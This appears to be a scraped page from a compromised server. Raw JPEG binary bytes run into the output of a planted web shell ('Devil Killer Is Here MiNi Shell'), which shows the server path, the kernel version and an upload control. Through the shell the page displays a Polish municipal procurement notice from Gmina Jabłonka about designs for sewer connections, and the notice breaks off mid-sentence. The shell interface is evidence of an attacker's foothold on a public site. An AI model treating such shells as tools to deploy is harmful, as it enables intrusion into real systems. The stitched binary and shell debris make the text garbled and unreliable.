JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220524/0017344601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> wykonanie projektów przyłączy kanalizacji sanitarnej w miejscowości : Jabłonka-Bory, Jabłonka-Centrum, Lipnica Mała, Podwilk, Zubrzyca Dolna i Zubrzyca Górna w Gminie Jabłonka </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA JABŁONKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 491892222</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. 3 Maja 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jabłonka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-480</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL219 - Nowotarski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">182611100</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@jablonka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.jablonka.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> wykonanie projektów przyłączy kanalizacji sanitarnej w miejscowości : Jabłonka-Bory, Jabłonka-Centrum, Lipnica Mała, Podwilk, Zubrzyca Dolna i Zubrzyca Górna w Gminie Jabłonka </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-942be40f-da91-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00173446</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00031891/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Opracowanie dokumentacji projektowej przyłączy kanalizacji sanitarnej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.jablonka.pl/index.php/zamowienia-publiczne-mainmenu-37/35-ogoszenia-o-przetargach <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja pomiędzy zamawiającym a wykonawca odbywa się przy użyciu<br/>następujących narzędzi:<br/>• miniPortalu https://miniportal.uzp.gov.pl/,<br/>• ePUAPu https://epuap.gov.pl/wps/portal<br/>Kontakt za pośrednictwem systemu ePUAP (w wyszukiwarce podmiotu należy wpisać &#34;Urząd Gminy<br/>Jabłonka&#34;).<br/>Elektroniczna skrzynka podawcza/Identyfikator adresata: /29gw7qf1xt/skrytka<br/>• poczty elektronicznej: sekretariat@jablonka.pl lub zpubliczne@jablonka.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na platformie ePUAP. Wykonawca posiadający konto na platformie ePUAP ma dostęp<br/>do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z miniPortalu (https://miniportal.uzp.gov.pl) oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). Maksymalny<br/>rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz<br/>do komunikacji wynosi 150 MB. Za datę przekazania oferty,<br/>wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ichprzekazania na ePUAP.<br/>Identyfikator postępowania dla danego postępowania o udzielenie zamówienia dostępne są na liście<br/>wszystkich postępowań na miniPortalu oraz stanowi załącznik nr 8 do niniejszej SWZ. Zamawiający<br/>przekazuje link do postępowania oraz ID postępowania jako załącznik nr 8 do niniejszej SWZ. Dane<br/>postępowanie można wyszukać również na Liście wszystkich postępowań klikając wcześniej opcję „Dla<br/>Wykonawców” lub ze strony głównej z zakładki Postępowania na miniPortalu Oferta powinna być<br/>sporządzona w języku polskim, z zachowaniem postaci elektronicznej w formacie danych np.: .pdf<br/>(zalecane) bądź innych rekomendowanych formatów np. .doc, .xls, .jpg, .jpeg, i podpisana<br/>kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistymprzez<br/>osobę umocowaną do działania w imieniu wykonawcy. Sposób złożenia oferty, w tym zaszyfrowania<br/>oferty opisany został w Instrukcja użytkownika systemu miniPortal-ePUAP. Oferta, wniosek oraz<br/>przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą zostać<br/>podpisane: kwalifikowalnym podpisem elektronicznym lub podpisem zaufanym lub podpisem<br/>osobistym. Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, o których<br/>mowa w rozporządzeniu w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415), składa się w<br/>formie elektronicznej, w zakresie i w sposób określony w przepisach wydanych na podstawie art. 70<br/>ustawy.<br/>2.3. Oferty, oświadczenia o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu,<br/>podmiotowe środki dowodowe, w tym oświadczenie wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, z którego wynika, które usługi wykonają poszczególni wykonawcy, oraz<br/>zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy, zwane<br/>dalej zobowiązaniem podmiotu udostępniającego zasoby, przedmiotowe środki dowodowe,<br/>pełnomocnictwo sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach<br/>wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności<br/>podmiotów realizujących zadania publiczne (Dz. U. z 2020 r. poz. 346, 568, 695, 1517 i 2320), z<br/>uwzględnieniem rodzaju przekazywanych danych.<br/>2.4. Informacje, oświadczenia lub dokumenty, inne niż określone w ust. 2, przekazywane w<br/>postępowaniu, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach<br/>wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności<br/>podmiotów realizujących zadania publiczne lub jako tekst wpisany bezpośrednio do wiadomości<br/>przekazywanej przy użyciu środków komunikacji elektronicznej, o których mowa w Rozdziale 20 swz.<br/>2.5. Dokumenty elektroniczne przekazuje się w postępowaniu przy użyciu środków komunikacji elektronicznej wskazanych w<br/>Rozdziale 20 swz.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">administratorem danych osobowych Wykonawcy jest Wójt<br/>Gminy Jabłonka, ul. 3 – go Maja 1, 34 – 480 Jabłonka;<br/>• Kontakt z inspektorem ochrony danych osobowych w Gminie Jabłonka kontakt: e-mail:<br/>iod@jablonka.pl, telefon 18/2611100;<br/>• dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>postępowaniem o udzielenie zamówienia publicznego /dane identyfikujące postępowanie, np. nazwa,<br/>numer/ prowadzonym w trybie podstawowym bez przeprowadzenia negocjacji nr RINT.271.1.11.2022<br/>„wykonanie projektów przyłączy kanalizacji sanitarnej w miejscowości : Jabłonka-Bory, Jabłonka-Centrum, Lipnica Mała, Podwilk, Zubrzyca Dolna i Zubrzyca Górna w Gminie Jabłonka ”.<br/>Podstawę prawna przetwarzania danych osobowych stanowi ustawa Prawo zamówień publicznych,<br/>wydanych na jej podstawie akty wykonawcze, a także ustawa o narodowym zasobie archiwalnym i<br/>archiwach.<br/>• odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. –<br/>Prawo zamówień publicznych (Dz. U. z 2021 r. poz. 1129 z późn. zm.), dalej „ustawa Pzp”;<br/>• dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały okres obowiązywania umowy lub dłuższym, jeżeli wynika to<br/>z odrębnych przepisów; Okresy te dotyczą również Wykonawców, którzy złożyli oferty i nie zostały one<br/>uznane, jako najkorzystniejsze (nie zawarto z tymi Wykonawcami umowy).<br/>• obowiązek podania przez Wykonawcę danych osobowych bezpośrednio dotyczących Wykonawcy<br/>jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy Pzp;<br/>• w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>• Wykonawca posiada:<br/> na podstawie art. 15 RODO prawo dostępu do danych osobowych Wykonawcy dotyczących;<br/> na podstawie art. 16 RODO prawo do sprostowania danych osobowych Wykonawcy (Wyjaśnienie:<br/>skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz<br/>nie może naruszać integralności protokołu oraz jego załączników);<br/> na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (Wyjaśnienie: prawo<br/>do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego);<br/> prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna,<br/>że przetwarzanie danych osobowych dotyczących Wykonawcy narusza przepisy RODO<br/>3.16.) RODO (ograniczenia stosowania): nie przysługuje Wykonawcy:<br/> w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Wykonawcy:<br/> w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RINT.271.1.11.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie projektów przyłączy kanalizacji sanitarnej w miejscowości: Jabłonka-Bory, Jabłonka-Centrum, Lipnica Mała, Podwilk, Zubrzyca Dolna i Zubrzyca Górna w Gminie Jabłonka <br/><br/>- sporządzenie projektu budowlanego, <br/>- sporządzenie projektów wykonawczych, <br/>- specyfikacji technicznych wykonania i odbioru robót budowlanych, <br/>- przedmiarów robót i kosztorysów inwestorskich poszczególnych branż, <br/>czyli kompletnej dokumentacji niezbędnej do wyłonienia wykonawcy i wykonania robót budowlanych.<br/>2.1. Realizacja zadania obejmuje:<br/>DANE WYJŚCIOWE DO PROJEKTOWANIA – (PFU).<br/>Wszystkie opracowania należy wykonać indywidulanie dla każdego przyłącza sanitarnego:<br/>Przedmiotem zamówienia są projekty budowlane przyłączy kanalizacji sanitarnej w miejscowościach Jabłonka-Centrum, Jabłonka-Bory, Lipnica Mała, Podwilk, Zubrzyca Dolna i Zubrzyca Górna w gminie Jabłonka. Łącznie do zaprojektowania jest 10 przyłączy kanalizacji: 3 przyłącza w Jabłonce-Centrum, 2 przyłącza w Jabłonce-Bory,1 przyłącze w Lipnicy Małej , 2 przyłącza Podwilku, 1 przyłącze Zubrzycy Dolnej i 1 przyłącze w Zubrzycy Górnej, w załączeniu schematy przebiegu przyłączy na podkładach mapowych.<br/>Kanalizacja sanitarna:<br/>przeszkody terenowe to: znaczne zróżnicowanie wysokości, drogi gminne oraz rów melioracyjny.<br/>Drogi które należy przekroczyć to drogi gminne. Działki po których będą przebiegać przyłącza to przeważnie działki osób fizycznych .<br/>Podstawowym celem projektowanego zamierzenia inwestycyjnego jest wykonanie projektów przyłączy kanalizacji sanitarnej, umożliwiający w następnym etapie ich budowę <br/>ZAŁĄCZNIKI:<br/>Plany sytuacyjne (Załącznik nr 12 załączniki graficzne).<br/><br/>2.2. W ramach zamówienia Wykonawca zobowiązany jest przenieść prawa własności intelektualnej tj. autorskie prawa majątkowe do wszystkich utworów w rozumieniu ustawy z dnia 4 lutego 1994 r. o prawie autorskim i prawach pokrewnych wytworzonych w trakcie realizacji zamówienia, w szczególności takich jak: mapy, wykresy, rysunki, plany, raporty, ekspertyzy, obliczenia i inne dokumenty powstałe przy realizacji zamówienia oraz zezwolić na wykonywanie przez Zamawiającego praw zależnych tj. zezwolić Zamawiającemu na rozporządzanie i korzystanie z opracowań utworów. Szczegółowe postanowienia dot. przeniesienia praw wskazanych w zdaniu poprzednim, zostały określone we wzorze umowy który stanowi Załącznik nr 7 do SWZ.<br/><br/>3. Nomenklatura Wspólnego Słownika Zamówień Publicznych (CPV):<br/>Wspólny Słownik Zamówień (CPV):<br/>główny kod CPV71320000-7 Usługi inżynieryjne w zakresie projektowania<br/>71245000-7 Plany zatwierdzające, rysunki robocze i specyfikacje<br/>71248000-8 Nadzór nad projektem i dokumentacją<br/><br/>4. Zamawiający opisał przedmiot zamówienia za pomocą Programu Funkcjonalno-Użytkowego załącznik nr 11 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71245000-7 - Plany zatwierdzające, rysunki robocze i specyfikacje</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">140 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający przy wyborze najkorzystniejszej oferty będzie kierował się następującymi kryteriami:<br/><br/>a)	Kryterium „cena oferty brutto” (Kc) – 60 pkt<br/>b)	Kryterium „długość oferowanego okresu gwarancji jakości na przedmiot umowy –” (Kg) – 40 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość oferowanego okresu gwarancji jakości na przedmiot umowy (Kg)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy niepodlegający wykluczeniu z powodów, o których mowa w art. 108 ust 1 pkt 1-6 (Rozdział 14 SWZ) i art. 109 ust. 1 ustawy Pzp w zakresie przewidzianym przez zamawiającego w niniejszej SWZ (Rozdział 15 SWZ), nie podlegający wykluczeniu z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 poz. 835), którzy spełniają warunki o których mowa w art. 112 ust 2 ustawy Pzp na poziomie wymaganym przez zamawiającego zgodnie z opisem poniżej.<br/><br/>W zakresie spełnienia warunku wymagane jest:<br/>d.a) dysponują lub będą dysponować następującym zespołem osób, który skierują do realizacji zamówienia: minimum 1 osobą mogącą wykonywać samodzielne funkcje techniczne w budownictwie, posiadającą odpowiednie uprawnienia budowlane do projektowania w specjalności inżynieryjnej sanitarnej <br/><br/>Uprawnienia, o których mowa powyżej, powinny być zgodne z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2020 r., poz. 1333 z późn. zm.) lub inne ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów pozwalające odpowiednio na wykonanie dokumentacji projektowej objętej przedmiotem zamówienia w danej branży lub też posiadającą ważne zdobyte w innych państwach równoważne kwalifikacje zawodowe, które zostały uznane na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2020 r. poz. 220) pozwalające odpowiednio na wykonanie dokumentacji projektowej objętej przedmiotem zamówienia w danej branży lub na kierowanie robotami budowlanymi objętymi przedmiotem zamówienia w danej branży. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu z postępowania na podstawie art. 108 ust. 1 ustawy,<br/>2) nie podlegają wykluczeniu z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa<br/>narodowego (Dz.U. z 2022 poz. 835),<br/>3. W celu potwierdzenia braku podstaw wykluczenia wykonawcy 